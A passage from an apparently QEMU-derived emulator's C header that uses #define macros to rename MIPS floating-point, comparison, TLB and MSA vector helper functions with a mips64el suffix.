helper_float_sqrt_s helper_float_sqrt_s_mips64el #define helper_float_cvtd_s helper_float_cvtd_s_mips64el #define helper_float_cvtd_w helper_float_cvtd_w_mips64el #define helper_float_cvtd_l helper_float_cvtd_l_mips64el #define helper_float_cvt_l_d helper_float_cvt_l_d_mips64el #define helper_float_cvt_l_s helper_float_cvt_l_s_mips64el #define helper_float_cvtps_pw helper_float_cvtps_pw_mips64el #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64el #define helper_float_cvts_d helper_float_cvts_d_mips64el #define helper_float_cvts_w helper_float_cvts_w_mips64el #define helper_float_cvts_l helper_float_cvts_l_mips64el #define helper_float_cvts_pl helper_float_cvts_pl_mips64el #define helper_float_cvts_pu helper_float_cvts_pu_mips64el #define helper_float_cvt_w_s helper_float_cvt_w_s_mips64el #define helper_float_cvt_w_d helper_float_cvt_w_d_mips64el #define helper_float_round_l_d helper_float_round_l_d_mips64el #define helper_float_round_l_s helper_float_round_l_s_mips64el #define helper_float_round_w_d helper_float_round_w_d_mips64el #define helper_float_round_w_s helper_float_round_w_s_mips64el #define helper_float_trunc_l_d helper_float_trunc_l_d_mips64el #define helper_float_trunc_l_s helper_float_trunc_l_s_mips64el #define helper_float_trunc_w_d helper_float_trunc_w_d_mips64el #define helper_float_trunc_w_s helper_float_trunc_w_s_mips64el #define helper_float_ceil_l_d helper_float_ceil_l_d_mips64el #define helper_float_ceil_l_s helper_float_ceil_l_s_mips64el #define helper_float_ceil_w_d helper_float_ceil_w_d_mips64el #define helper_float_ceil_w_s helper_float_ceil_w_s_mips64el #define helper_float_floor_l_d helper_float_floor_l_d_mips64el #define helper_float_floor_l_s helper_float_floor_l_s_mips64el #define helper_float_floor_w_d helper_float_floor_w_d_mips64el #define helper_float_floor_w_s helper_float_floor_w_s_mips64el #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mips64el #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mips64el #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mips64el #define helper_float_cvt_2008_w_s helper_float_cvt_2008_w_s_mips64el #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mips64el #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mips64el #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mips64el #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mips64el #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mips64el #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mips64el #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mips64el #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mips64el #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mips64el #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mips64el #define helper_float_ceil_2008_w_d helper_float_ceil_2008_w_d_mips64el #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mips64el #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mips64el #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mips64el #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mips64el #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mips64el #define helper_float_abs_d helper_float_abs_d_mips64el #define helper_float_abs_s helper_float_abs_s_mips64el #define helper_float_abs_ps helper_float_abs_ps_mips64el #define helper_float_chs_d helper_float_chs_d_mips64el #define helper_float_chs_s helper_float_chs_s_mips64el #define helper_float_chs_ps helper_float_chs_ps_mips64el #define helper_float_recip_d helper_float_recip_d_mips64el #define helper_float_recip_s helper_float_recip_s_mips64el #define helper_float_rsqrt_d helper_float_rsqrt_d_mips64el #define helper_float_rsqrt_s helper_float_rsqrt_s_mips64el #define helper_float_recip1_d helper_float_recip1_d_mips64el #define helper_float_recip1_s helper_float_recip1_s_mips64el #define helper_float_recip1_ps helper_float_recip1_ps_mips64el #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64el #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64el #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64el #define helper_float_rint_s helper_float_rint_s_mips64el #define helper_float_rint_d helper_float_rint_d_mips64el #define float_class_s float_class_s_mips64el #define helper_float_class_s helper_float_class_s_mips64el #define float_class_d float_class_d_mips64el #define helper_float_class_d helper_float_class_d_mips64el #define helper_float_add_d helper_float_add_d_mips64el #define helper_float_add_s helper_float_add_s_mips64el #define helper_float_add_ps helper_float_add_ps_mips64el #define helper_float_sub_d helper_float_sub_d_mips64el #define helper_float_sub_s helper_float_sub_s_mips64el #define helper_float_sub_ps helper_float_sub_ps_mips64el #define helper_float_mul_d helper_float_mul_d_mips64el #define helper_float_mul_s helper_float_mul_s_mips64el #define helper_float_mul_ps helper_float_mul_ps_mips64el #define helper_float_div_d helper_float_div_d_mips64el #define helper_float_div_s helper_float_div_s_mips64el #define helper_float_div_ps helper_float_div_ps_mips64el #define helper_float_recip2_d helper_float_recip2_d_mips64el #define helper_float_recip2_s helper_float_recip2_s_mips64el #define helper_float_recip2_ps helper_float_recip2_ps_mips64el #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64el #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64el #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64el #define helper_float_addr_ps helper_float_addr_ps_mips64el #define helper_float_mulr_ps helper_float_mulr_ps_mips64el #define helper_float_max_s helper_float_max_s_mips64el #define helper_float_max_d helper_float_max_d_mips64el #define helper_float_maxa_s helper_float_maxa_s_mips64el #define helper_float_maxa_d helper_float_maxa_d_mips64el #define helper_float_min_s helper_float_min_s_mips64el #define helper_float_min_d helper_float_min_d_mips64el #define helper_float_mina_s helper_float_mina_s_mips64el #define helper_float_mina_d helper_float_mina_d_mips64el #define helper_float_madd_d helper_float_madd_d_mips64el #define helper_float_madd_s helper_float_madd_s_mips64el #define helper_float_madd_ps helper_float_madd_ps_mips64el #define helper_float_msub_d helper_float_msub_d_mips64el #define helper_float_msub_s helper_float_msub_s_mips64el #define helper_float_msub_ps helper_float_msub_ps_mips64el #define helper_float_nmadd_d helper_float_nmadd_d_mips64el #define helper_float_nmadd_s helper_float_nmadd_s_mips64el #define helper_float_nmadd_ps helper_float_nmadd_ps_mips64el #define helper_float_nmsub_d helper_float_nmsub_d_mips64el #define helper_float_nmsub_s helper_float_nmsub_s_mips64el #define helper_float_nmsub_ps helper_float_nmsub_ps_mips64el #define helper_float_maddf_s helper_float_maddf_s_mips64el #define helper_float_maddf_d helper_float_maddf_d_mips64el #define helper_float_msubf_s helper_float_msubf_s_mips64el #define helper_float_msubf_d helper_float_msubf_d_mips64el #define helper_cmp_d_f helper_cmp_d_f_mips64el #define helper_cmpabs_d_f helper_cmpabs_d_f_mips64el #define helper_cmp_d_un helper_cmp_d_un_mips64el #define helper_cmpabs_d_un helper_cmpabs_d_un_mips64el #define helper_cmp_d_eq helper_cmp_d_eq_mips64el #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64el #define helper_cmp_d_ueq helper_cmp_d_ueq_mips64el #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64el #define helper_cmp_d_olt helper_cmp_d_olt_mips64el #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64el #define helper_cmp_d_ult helper_cmp_d_ult_mips64el #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64el #define helper_cmp_d_ole helper_cmp_d_ole_mips64el #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64el #define helper_cmp_d_ule helper_cmp_d_ule_mips64el #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64el #define helper_cmp_d_sf helper_cmp_d_sf_mips64el #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64el #define helper_cmp_d_ngle helper_cmp_d_ngle_mips64el #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips64el #define helper_cmp_d_seq helper_cmp_d_seq_mips64el #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64el #define helper_cmp_d_ngl helper_cmp_d_ngl_mips64el #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64el #define helper_cmp_d_lt helper_cmp_d_lt_mips64el #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64el #define helper_cmp_d_nge helper_cmp_d_nge_mips64el #define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64el #define helper_cmp_d_le helper_cmp_d_le_mips64el #define helper_cmpabs_d_le helper_cmpabs_d_le_mips64el #define helper_cmp_d_ngt helper_cmp_d_ngt_mips64el #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64el #define helper_cmp_s_f helper_cmp_s_f_mips64el #define helper_cmpabs_s_f helper_cmpabs_s_f_mips64el #define helper_cmp_s_un helper_cmp_s_un_mips64el #define helper_cmpabs_s_un helper_cmpabs_s_un_mips64el #define helper_cmp_s_eq helper_cmp_s_eq_mips64el #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64el #define helper_cmp_s_ueq helper_cmp_s_ueq_mips64el #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64el #define helper_cmp_s_olt helper_cmp_s_olt_mips64el #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64el #define helper_cmp_s_ult helper_cmp_s_ult_mips64el #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64el #define helper_cmp_s_ole helper_cmp_s_ole_mips64el #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64el #define helper_cmp_s_ule helper_cmp_s_ule_mips64el #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64el #define helper_cmp_s_sf helper_cmp_s_sf_mips64el #define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64el #define helper_cmp_s_ngle helper_cmp_s_ngle_mips64el #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64el #define helper_cmp_s_seq helper_cmp_s_seq_mips64el #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64el #define helper_cmp_s_ngl helper_cmp_s_ngl_mips64el #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64el #define helper_cmp_s_lt helper_cmp_s_lt_mips64el #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64el #define helper_cmp_s_nge helper_cmp_s_nge_mips64el #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64el #define helper_cmp_s_le helper_cmp_s_le_mips64el #define helper_cmpabs_s_le helper_cmpabs_s_le_mips64el #define helper_cmp_s_ngt helper_cmp_s_ngt_mips64el #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64el #define helper_cmp_ps_f helper_cmp_ps_f_mips64el #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64el #define helper_cmp_ps_un helper_cmp_ps_un_mips64el #define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64el #define helper_cmp_ps_eq helper_cmp_ps_eq_mips64el #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64el #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64el #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64el #define helper_cmp_ps_olt helper_cmp_ps_olt_mips64el #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64el #define helper_cmp_ps_ult helper_cmp_ps_ult_mips64el #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64el #define helper_cmp_ps_ole helper_cmp_ps_ole_mips64el #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64el #define helper_cmp_ps_ule helper_cmp_ps_ule_mips64el #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64el #define helper_cmp_ps_sf helper_cmp_ps_sf_mips64el #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64el #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64el #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64el #define helper_cmp_ps_seq helper_cmp_ps_seq_mips64el #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips64el #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64el #define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips64el #define helper_cmp_ps_lt helper_cmp_ps_lt_mips64el #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64el #define helper_cmp_ps_nge helper_cmp_ps_nge_mips64el #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64el #define helper_cmp_ps_le helper_cmp_ps_le_mips64el #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64el #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64el #define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64el #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64el #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64el #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64el #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64el #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64el #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64el #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64el #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64el #define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips64el #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64el #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64el #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64el #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64el #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64el #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64el #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64el #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64el #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64el #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64el #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64el #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64el #define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64el #define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips64el #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64el #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64el #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips64el #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64el #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64el #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64el #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64el #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips64el #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64el #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64el #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64el #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64el #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64el #define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64el #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64el #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64el #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64el #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64el #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64el #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64el #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64el #define no_mmu_map_address no_mmu_map_address_mips64el #define fixed_mmu_map_address fixed_mmu_map_address_mips64el #define r4k_map_address r4k_map_address_mips64el #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mips64el #define sync_c0_status sync_c0_status_mips64el #define cpu_mips_store_status cpu_mips_store_status_mips64el #define cpu_mips_store_cause cpu_mips_store_cause_mips64el #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64el #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mips64el #define cpu_mips_translate_address cpu_mips_translate_address_mips64el #define exception_resume_pc exception_resume_pc_mips64el #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64el #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64el #define r4k_invalidate_tlb r4k_invalidate_tlb_mips64el #define do_raise_exception_err do_raise_exception_err_mips64el #define helper_paddsb helper_paddsb_mips64el #define helper_paddusb helper_paddusb_mips64el #define helper_paddsh helper_paddsh_mips64el #define helper_paddush helper_paddush_mips64el #define helper_paddb helper_paddb_mips64el #define helper_paddh helper_paddh_mips64el #define helper_paddw helper_paddw_mips64el #define helper_psubsb helper_psubsb_mips64el #define helper_psubusb helper_psubusb_mips64el #define helper_psubsh helper_psubsh_mips64el #define helper_psubush helper_psubush_mips64el #define helper_psubb helper_psubb_mips64el #define helper_psubh helper_psubh_mips64el #define helper_psubw helper_psubw_mips64el #define helper_pshufh helper_pshufh_mips64el #define helper_packsswh helper_packsswh_mips64el #define helper_packsshb helper_packsshb_mips64el #define helper_packushb helper_packushb_mips64el #define helper_punpcklwd helper_punpcklwd_mips64el #define helper_punpckhwd helper_punpckhwd_mips64el #define helper_punpcklhw helper_punpcklhw_mips64el #define helper_punpckhhw helper_punpckhhw_mips64el #define helper_punpcklbh helper_punpcklbh_mips64el #define helper_punpckhbh helper_punpckhbh_mips64el #define helper_pavgh helper_pavgh_mips64el #define helper_pavgb helper_pavgb_mips64el #define helper_pmaxsh helper_pmaxsh_mips64el #define helper_pminsh helper_pminsh_mips64el #define helper_pmaxub helper_pmaxub_mips64el #define helper_pminub helper_pminub_mips64el #define helper_pcmpeqw helper_pcmpeqw_mips64el #define helper_pcmpgtw helper_pcmpgtw_mips64el #define helper_pcmpeqh helper_pcmpeqh_mips64el #define helper_pcmpgth helper_pcmpgth_mips64el #define helper_pcmpeqb helper_pcmpeqb_mips64el #define helper_pcmpgtb helper_pcmpgtb_mips64el #define helper_psllw helper_psllw_mips64el #define helper_psrlw helper_psrlw_mips64el #define helper_psraw helper_psraw_mips64el #define helper_psllh helper_psllh_mips64el #define helper_psrlh helper_psrlh_mips64el #define helper_psrah helper_psrah_mips64el #define helper_pmullh helper_pmullh_mips64el #define helper_pmulhh helper_pmulhh_mips64el #define helper_pmulhuh helper_pmulhuh_mips64el #define helper_pmaddhw helper_pmaddhw_mips64el #define helper_pasubub helper_pasubub_mips64el #define helper_biadd helper_biadd_mips64el #define helper_pmovmskb helper_pmovmskb_mips64el #define helper_msa_nloc_b helper_msa_nloc_b_mips64el #define helper_msa_nloc_h helper_msa_nloc_h_mips64el #define helper_msa_nloc_w helper_msa_nloc_w_mips64el #define helper_msa_nloc_d helper_msa_nloc_d_mips64el #define helper_msa_nlzc_b helper_msa_nlzc_b_mips64el #define helper_msa_nlzc_h helper_msa_nlzc_h_mips64el #define helper_msa_nlzc_w helper_msa_nlzc_w_mips64el #define helper_msa_nlzc_d helper_msa_nlzc_d_mips64el #define helper_msa_pcnt_b helper_msa_pcnt_b_mips64el #define helper_msa_pcnt_h helper_msa_pcnt_h_mips64el #define helper_msa_pcnt_w helper_msa_pcnt_w_mips64el #define helper_msa_pcnt_d helper_msa_pcnt_d_mips64el #define helper_msa_binsl_b helper_msa_binsl_b_mips64el #define helper_msa_binsl_h helper_msa_binsl_h_mips64el #define helper_msa_binsl_w helper_msa_binsl_w_mips64el #define helper_msa_binsl_d helper_msa_binsl_d_mips64el #define helper_msa_binsr_b helper_msa_binsr_b_mips64el #define helper_msa_binsr_h helper_msa_binsr_h_mips64el #define helper_msa_binsr_w helper_msa_binsr_w_mips64el #define helper_msa_binsr_d helper_msa_binsr_d_mips64el #define helper_msa_bmnz_v helper_msa_bmnz_v_mips64el #define helper_msa_bmz_v helper_msa_bmz_v_mips64el #define helper_msa_bsel_v helper_msa_bsel_v_mips64el #define helper_msa_bclr_b helper_msa_bclr_b_mips64el #define helper_msa_bclr_h helper_msa_bclr_h_mips64el #define helper_msa_bclr_w helper_msa_bclr_w_mips64el #define helper_msa_bclr_d helper_msa_bclr_d_mips64el #define helper_msa_bneg_b helper_msa_bneg_b_mips64el #define helper_msa_bneg_h helper_msa_bneg_h_mips64el #define helper_msa_bneg_w helper_msa_bneg_w_mips64el #define helper_msa_bneg_d helper_msa_bneg_d_mips64el #define helper_msa_bset_b helper_msa_bset_b_mips64el #define helper_msa_bset_h helper_msa_bset_h_mips64el #define helper_msa_bset_w helper_msa_bset_w_mips64el #define helper_msa_bset_d helper_msa_bset_d_mips64el #define helper_msa_add_a_b helper_msa_add_a_b_mips64el #define helper_msa_add_a_h helper_msa_add_a_h_mips64el #define helper_msa_add_a_w helper_msa_add_a_w_mips64el #define helper_msa_add_a_d helper_msa_add_a_d_mips64el #define helper_msa_adds_a_b helper_msa_adds_a_b_mips64el #define helper_msa_adds_a_h helper_msa_adds_a_h_mips64el #define helper_msa_adds_a_w helper_msa_adds_a_w_mips64el #define helper_msa_adds_a_d helper_msa_adds_a_d_mips64el #define helper_msa_adds_s_b helper_msa_adds_s_b_mips64el #define helper_msa_adds_s_h helper_msa_adds_s_h_mips64el #define helper_msa_adds_s_w helper_msa_adds_s_w_mips64el #define helper_msa_adds_s_d helper_msa_adds_s_d_mips64el #define helper_msa_adds_u_b helper_msa_adds_u_b_mips64el #define helper_msa_adds_u_h helper_msa_adds_u_h_mips64el #define helper_msa_adds_u_w helper_msa_adds_u_w_mips64el #define helper_msa_adds_u_d helper_msa_adds_u_d_mips64el #define helper_msa_addv_b helper_msa_addv_b_mips64el #define helper_msa_addv_h helper_msa_addv_h_mips64el #define helper_msa_addv_w helper_msa_addv_w_mips64el #define helper_msa_addv_d helper_msa_addv_d_mips64el #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mips64el #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mips64el #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mips64el #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mips64el #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mips64el #define helper_msa_hadd_u_d helper_msa_hadd_u_d_mips64el #define helper_msa_ave_s_b helper_msa_ave_s_b_mips64el #define helper_msa_ave_s_h helper_msa_ave_s_h_mips64el #define helper_msa_ave_s_w helper_msa_ave_s_w_mips64el #define helper_msa_ave_s_d helper_msa_ave_s_d_mips64el #define helper_msa_ave_u_b helper_msa_ave_u_b_mips64el #define helper_msa_ave_u_h helper_msa_ave_u_h_mips64el #define helper_msa_ave_u_w helper_msa_ave_u_w_mips64el #define helper_msa_ave_u_d helper_msa_ave_u_d_mips64el #define helper_msa_aver_s_b helper_msa_aver_s_b_mips64el #define helper_msa_aver_s_h helper_msa_aver_s_h_mips64el #define helper_msa_aver_s_w helper_msa_aver_s_w_mips64el #define helper_msa_aver_s_d helper_msa_aver_s_d_mips64el #define helper_msa_aver_u_b helper_msa_aver_u_b_mips64el #define helper_msa_aver_u_h helper_msa_aver_u_h_mips64el #define helper_msa_aver_u_w helper_msa_aver_u_w_mips64el #define helper_msa_aver_u_d helper_msa_aver_u_d_mips64el #define helper_msa_ceq_b helper_msa_ceq_b_mips64el #define helper_msa_ceq_h helper_msa_ceq_h_mips64el #define helper_msa_ceq_w helper_msa_ceq_w_mips64el #define helper_msa_ceq_d helper_msa_ceq_d_mips64el #define helper_msa_cle_s_b helper_msa_cle_s_b_mips64el #define helper_msa_cle_s_h helper_msa_cle_s_h_mips64el #define helper_msa_cle_s_w helper_msa_cle_s_w_mips64el #define helper_msa_cle_s_d helper_msa_cle_s_d_mips64el #define helper_msa_cle_u_b helper_msa_cle_u_b_mips64el #define helper_msa_cle_u_h helper_msa_cle_u_h_mips64el #define helper_msa_cle_u_w helper_msa_cle_u_w_mips64el #define helper_msa_cle_u_d helper_msa_cle_u_d_mips64el #define helper_msa_clt_s_b helper_msa_clt_s_b_mips64el #define helper_msa_clt_s_h helper_msa_clt_s_h_mips64el #define helper_msa_clt_s_w helper_msa_clt_s_w_mips64el #define helper_msa_clt_s_d helper_msa_clt_s_d_mips64el #define helper_msa_clt_u_b helper_msa_clt_u_b_mips64el #define helper_msa_clt_u_h helper_msa_clt_u_h_mips64el #define helper_msa_clt_u_w helper_msa_clt_u_w_mips64el #define helper_msa_clt_u_d helper_msa_clt_u_d_mips64el #define helper_msa_div_s_b helper_msa_div_s_b_mips64el #define helper_msa_div_s_h helper_msa_div_s_h_mips64el #define helper_msa_div_s_w helper_msa_div_s_w_mips64el #define helper_msa_div_s_d helper_msa_div_s_d_mips64el #define helper_msa_div_u_b helper_msa_div_u_b_mips64el #define helper_msa_div_u_h helper_msa_div_u_h_mips64el #define helper_msa_div_u_w helper_msa_div_u_w_mips64el #define helper_msa_div_u_d helper_msa_div_u_d_mips64el #define helper_msa_max_a_b helper_msa_max_a_b_mips64el #define helper_msa_max_a_h helper_msa_max_a_h_mips64el #define helper_msa_max_a_w helper_msa_max_a_w_mips64el #define helper_msa_max_a_d helper_msa_max_a_d_mips64el #define helper_msa_max_s_b helper_msa_max_s_b_mips64el #define helper_msa_max_s_h helper_msa_max_s_h_mips64el #define helper_msa_max_s_w helper_msa_max_s_w_mips64el #define helper_msa_max_s_d helper_msa_max_s_d_mips64el #define helper_msa_max_u_b helper_msa_max_u_b_mips64el #define helper_msa_max_u_h helper_msa_max_u_h_mips64el #define helper_msa_max_u_w helper_msa_max_u_w_mips64el #define helper_msa_max_u_d helper_msa_max_u_d_mips64el #define helper_msa_min_a_b helper_msa_min_a_b_mips64el #define helper_msa_min_a_h helper_msa_min_a_h_mips64el #define helper_msa_min_a_w helper_msa_min_a_w_mips64el #define helper_msa_min_a_d helper_msa_min_a_d_mips64el #define helper_msa_min_s_b helper_msa_min_s_b_mips64el #define helper_msa_min_s_h helper_msa_min_s_h_mips64el #define helper_msa_min_s_w helper_msa_min_s_w_mips64el #define helper_msa_min_s_d helper_msa_min_s_d_mips64el #define helper_msa_min_u_b helper_msa_min_u_b_mips64el #define helper_msa_min_u_h helper_msa_min_u_h_mips64el #define helper_msa_min_u_w helper_msa_min_u_w_mips64el #define helper_msa_min_u_d helper_msa_min_u_d_mips64el #define helper_msa_mod_s_b helper_msa_mod_s_b_mips64el #define helper_msa_mod_s_h helper_msa_mod_s_h_mips64el #define helper_msa_mod_s_w helper_msa_mod_s_w_mips64el #define helper_msa_mod_s_d helper_msa_mod_s_d_mips64el #define helper_msa_mod_u_b helper_msa_mod_u_b_mips64el #define helper_msa_mod_u_h helper_msa_mod_u_h_mips64el #define helper_msa_mod_u_w helper_msa_mod_u_w_mips64el #define helper_msa_mod_u_d helper_msa_mod_u_d_mips64el #define helper_msa_asub_s_b helper_msa_asub_s_b_mips64el #define helper_msa_asub_s_h helper_msa_asub_s_h_mips64el #define helper_msa_asub_s_w helper_msa_asub_s_w_mips64el #define helper_msa_asub_s_d helper_msa_asub_s_d_mips64el #define helper_msa_asub_u_b helper_msa_asub_u_b_mips64el #define helper_msa_asub_u_h helper_msa_asub_u_h_mips64el #define helper_msa_asub_u_w helper_msa_asub_u_w_mips64el #define helper_msa_asub_u_d helper_msa_asub_u_d_mips64el #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mips64el #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mips64el #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mips64el #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mips64el #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mips64el #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mips64el #define helper_msa_ilvev_b helper_msa_ilvev_b_mips64el #define helper_msa_ilvev_h helper_msa_ilvev_h_mips64el #define helper_msa_ilvev_w helper_msa_ilvev_w_mips64el #define helper_msa_ilvev_d helper_msa_ilvev_d_mips64el #define helper_msa_ilvod_b helper_msa_ilvod_b_mips64el #define helper_msa_ilvod_h helper_msa_ilvod_h_mips64el #define helper_msa_ilvod_w helper_msa_ilvod_w_mips64el #define helper_msa_ilvod_d helper_msa_ilvod_d_mips64el #define helper_msa_ilvl_b helper_msa_ilvl_b_mips64el #define helper_msa_ilvl_h helper_msa_ilvl_h_mips64el #define helper_msa_ilvl_w helper_msa_ilvl_w_mips64el #define helper_msa_ilvl_d helper_msa_ilvl_d_mips64el #define helper_msa_ilvr_b helper_msa_ilvr_b_mips64el #define helper_msa_ilvr_h helper_msa_ilvr_h_mips64el #define helper_msa_ilvr_w helper_msa_ilvr_w_mips64el #define helper_msa_ilvr_d helper_msa_ilvr_d_mips64el #define helper_msa_and_v helper_msa_and_v_mips64el #define helper_msa_nor_v helper_msa_nor_v_mips64el #define helper_msa_or_v helper_msa_or_v_mips64el #define helper_msa_xor_v helper_msa_xor_v_mips64el #define helper_msa_move_v helper_msa_move_v_mips64el #define helper_msa_pckev_b helper_msa_pckev_b_mips64el #define helper_msa_pckev_h helper_msa_pckev_h_mips64el #define helper_msa_pckev_w helper_msa_pckev_w_mips64el #define helper_msa_pckev_d helper_msa_pckev_d_mips64el #define helper_msa_pckod_b helper_msa_pckod_b_mips64el #define helper_msa_pckod_h helper_msa_pckod_h_mips64el #define helper_msa_pckod_w helper_msa_pckod_w_mips64el #define helper_msa_pckod_d helper_msa_pckod_d_mips64el #define helper_msa_sll_b helper_msa_sll_b_mips64el #define helper_msa_sll_h helper_msa_sll_h_mips64el #define helper_msa_sll_w helper_msa_sll_w_mips64el #define helper_msa_sll_d helper_msa_sll_d_mips64el #define helper_msa_sra_b 